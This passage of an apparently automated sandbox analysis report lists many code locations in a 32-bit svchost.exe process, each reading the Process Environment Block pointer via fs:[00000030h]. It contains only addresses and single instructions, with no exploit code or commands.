Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672750 mov eax, dword ptr fs:[00000030h] 9_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B4755 mov eax, dword ptr fs:[00000030h] 9_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h] 9_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h] 9_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366273C mov eax, dword ptr fs:[00000030h] 9_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366273C mov ecx, dword ptr fs:[00000030h] 9_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366273C mov eax, dword ptr fs:[00000030h] 9_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AC730 mov eax, dword ptr fs:[00000030h] 9_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366C700 mov eax, dword ptr fs:[00000030h] 9_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630710 mov eax, dword ptr fs:[00000030h] 9_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03660710 mov eax, dword ptr fs:[00000030h] 9_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036527ED mov eax, dword ptr fs:[00000030h] 9_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036527ED mov eax, dword ptr fs:[00000030h] 9_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036527ED mov eax, dword ptr fs:[00000030h] 9_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BE7E1 mov eax, dword ptr fs:[00000030h] 9_2_036BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036347FB mov eax, dword ptr fs:[00000030h] 9_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036347FB mov eax, dword ptr fs:[00000030h] 9_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363C7C0 mov eax, dword ptr fs:[00000030h] 9_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B07C3 mov eax, dword ptr fs:[00000030h] 9_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036307AF mov eax, dword ptr fs:[00000030h] 9_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E47A0 mov eax, dword ptr fs:[00000030h] 9_2_036E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D678E mov eax, dword ptr fs:[00000030h] 9_2_036D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F866E mov eax, dword ptr fs:[00000030h] 9_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F866E mov eax, dword ptr fs:[00000030h] 9_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h] 9_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h] 9_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03662674 mov eax, dword ptr fs:[00000030h] 9_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364C640 mov eax, dword ptr fs:[00000030h] 9_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E627 mov eax, dword ptr fs:[00000030h] 9_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03666620 mov eax, dword ptr fs:[00000030h] 9_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03668620 mov eax, dword ptr fs:[00000030h] 9_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363262C mov eax, dword ptr fs:[00000030h] 9_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE609 mov eax, dword ptr fs:[00000030h] 9_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364260B mov eax, dword ptr fs:[00000030h] 9_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672619 mov eax, dword ptr fs:[00000030h] 9_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 9_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 9_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 9_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h] 9_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h] 9_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h] 9_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A6C7 mov ebx, dword ptr fs:[00000030h] 9_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A6C7 mov eax, dword ptr fs:[00000030h] 9_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366C6A6 mov eax, dword ptr fs:[00000030h] 9_2_0366C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036666B0 mov eax, dword ptr fs:[00000030h] 9_2_036666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634690 mov eax, dword ptr fs:[00000030h] 9_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634690 mov eax, dword ptr fs:[00000030h] 9_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366656A mov eax, dword ptr fs:[00000030h] 9_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366656A mov eax, dword ptr fs:[00000030h] 9_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366656A mov eax, dword ptr fs:[00000030h] 9_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638550 mov eax, dword ptr fs:[00000030h] 9_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638550 mov eax, dword ptr fs:[00000030h] 9_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 mov eax, dword ptr fs:[00000030h] 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 mov eax, dword ptr fs:[00000030h] 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 mov eax, dword ptr fs:[00000030h] 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 mov eax, dword ptr fs:[00000030h] 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 mov eax, dword ptr fs:[00000030h] 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 mov eax, dword ptr fs:[00000030h] 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h] 9_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h] 9_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h] 9_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h] 9_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h] 9_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C6500 mov eax, dword ptr fs:[00000030h] 9_2_036C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704500 mov eax, dword ptr fs:[00000030h] 9_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 9_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036325E0 mov eax, dword ptr fs:[00000030h] 9_2_036325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366C5ED mov eax, dword ptr fs:[00000030h] 9_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366C5ED mov eax, dword ptr fs:[00000030h] 9_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E5CF mov eax, dword ptr fs:[00000030h] 9_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E5CF mov eax, dword ptr fs:[00000030h] 9_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036365D0 mov eax, dword ptr fs:[00000030h] 9_2_036365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 9_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 9_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h] 9_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h] 9_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h] 9_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036545B1 mov eax, dword ptr fs:[00000030h] 9_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036545B1 mov eax, dword ptr fs:[00000030h] 9_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03632582 mov eax, dword ptr fs:[00000030h] 9_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03632582 mov ecx, dword ptr fs:[00000030h] 9_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03664588 mov eax, dword ptr fs:[00000030h] 9_2_03664588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E59C mov eax, dword ptr fs:[00000030h] 9_2_0366E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BC460 mov ecx, dword ptr fs:[00000030h] 9_2_036BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h] 9_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h] 9_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h] 9_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h] 9_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EA456 mov eax, dword ptr fs:[00000030h] 9_2_036EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362645D mov eax, dword ptr fs:[00000030h] 9_2_0362645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365245A mov eax, dword ptr fs:[00000030h] 9_2_0365245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h] 9_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h] 9_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h] 9_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C427 mov eax, dword ptr fs:[00000030h] 9_2_0362C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h] 9_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A430 mov eax, dword ptr fs:[00000030h] 9_2_0366A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03668402 mov eax, dword ptr fs:[00000030h] 9_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03668402 mov eax, dword ptr fs:[00000030h] 9_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03668402 mov eax, dword ptr fs:[00000030h] 9_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036304E5 mov ecx, dword ptr fs:[00000030h] 9_2_036304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036364AB mov eax, dword ptr fs:[00000030h] 9_2_036364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036644B0 mov ecx, dword ptr fs:[00000030h] 9_2_036644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BA4B0 mov eax, dword ptr fs:[00000030h] 9_2_036BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EA49A mov eax, dword ptr fs:[00000030h] 9_2_036EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362CB7E mov eax, dword ptr fs:[00000030h] 9_2_0362CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E4B4B mov eax, dword ptr fs:[00000030h] 9_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E4B4B mov eax, dword ptr fs:[00000030h] 9_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h] 9_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h] 9_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h] 9_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h] 9_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C6B40 mov eax, dword ptr fs:[00000030h] 9_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C6B40 mov eax, dword ptr fs:[00000030h] 9_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FAB40 mov eax, dword ptr fs:[00000030h] 9_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D8B42 mov eax, dword ptr fs:[00000030h] 9_2_036D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628B50 mov eax, dword ptr fs:[00000030h] 9_2_03628B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DEB50 mov eax, dword ptr fs:[00000030h] 9_2_036DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365EB20 mov eax, dword ptr fs:[00000030h] 9_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365EB20 mov eax, dword ptr fs:[00000030h] 9_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F8B28 mov eax, dword ptr fs:[00000030h] 9_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F8B28 mov eax, dword ptr fs:[00000030h] 9_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704B00 mov eax, dword ptr fs:[00000030h] 9_2_03704B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h] 9_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h] 9_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h] 9_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h] 9_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365EBFC mov eax, dword ptr fs:[00000030h] 9_2_0365EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BCBF0 mov eax, dword ptr fs:[00000030h] 9_2_036BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h] 9_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h] 9_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h] 9_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h] 9_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h] 9_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h] 9_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DEBD0 mov eax, dword ptr fs:[00000030h] 9_2_036DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640BBE mov eax, dword ptr fs:[00000030h] 9_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640BBE mov eax, dword ptr fs:[00000030h] 9_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 9_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 9_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h] 9_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h] 9_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h] 9_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DEA60 mov eax, dword ptr fs:[00000030h] 9_2_036DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036ACA72 mov eax, dword ptr fs:[00000030h] 9_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036ACA72 mov eax, dword ptr fs:[00000030h] 9_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h] 9_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640A5B mov eax, dword ptr fs:[00000030h] 9_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640A5B mov eax, dword ptr fs:[00000030h] 9_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366CA24 mov eax, dword ptr fs:[00000030h] 9_2_0366CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365EA2E mov eax, dword ptr fs:[00000030h] 9_2_0365EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03654A35 mov eax, dword ptr fs:[00000030h] 9_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03654A35 mov eax, dword ptr fs:[00000030h] 9_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366CA38 mov eax, dword ptr fs:[00000030h] 9_2_0366CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BCA11 mov eax, dword ptr fs:[00000030h] 9_2_036BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366AAEE mov eax, dword ptr fs:[00000030h] 9_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366AAEE mov eax, dword ptr fs:[00000030h] 9_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h] 9_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h] 9_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h] 9_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630AD0 mov eax, dword ptr fs:[00000030h] 9_2_03630AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03664AD0 mov eax, dword ptr fs:[00000030h] 9_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03664AD0 mov eax, dword ptr fs:[00000030h] 9_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638AA0 mov eax, dword ptr fs:[00000030h] 9_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638AA0 mov eax, dword ptr fs:[00000030h] 9_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03686AA4 mov eax, dword ptr fs:[00000030h] 9_2_03686AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h] 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704A80 mov eax, dword ptr fs:[00000030h] 9_2_03704A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03668A90 mov edx, dword ptr fs:[00000030h] 9_2_03668A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03656962 mov eax, dword ptr fs:[00000030h] 9_2_03656962
